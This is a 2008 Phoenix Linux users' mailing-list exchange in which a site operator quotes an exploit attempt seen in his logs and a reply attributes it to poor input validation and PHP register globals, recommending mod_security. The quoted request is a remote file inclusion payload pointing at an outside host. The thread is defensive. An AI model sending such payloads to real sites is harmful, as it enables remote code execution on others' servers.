OT: Website Exploits

JD Austin jd at twingeckos.com
Wed Dec 3 15:48:17 MST 2008


That is a fairly common tactic.
It exploits poor input validation and register globals in PHP.
Do yourself a huge favor and install mod_security (I assume you're using
apache?)
as an extra measure of security if you haven't already.


On Wed, Dec 3, 2008 at 3:39 PM, keith smith <klsmith2020 at yahoo.com> wrote:

>
> Hi,
>
> I am working on a website that gets a lot of exploit attempts.
>
> They mostly look like this:  /index.php?display=
> http://humano.ya.com/mysons/index.htm?
>
> Our code is set to disregard any value that is not expected.
>
> I'm wondering if there is a clearing house for reporting this type of
> stuff.  I have the IP address as reported.... if that is accurate.
>
> Thanks in advance!
>
> Keith
>
>
>
>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.PLUG.phoenix.az.us/pipermail/plug-discuss/attachments/20081203/07de257b/attachment.htm 


More information about the PLUG-discuss mailing list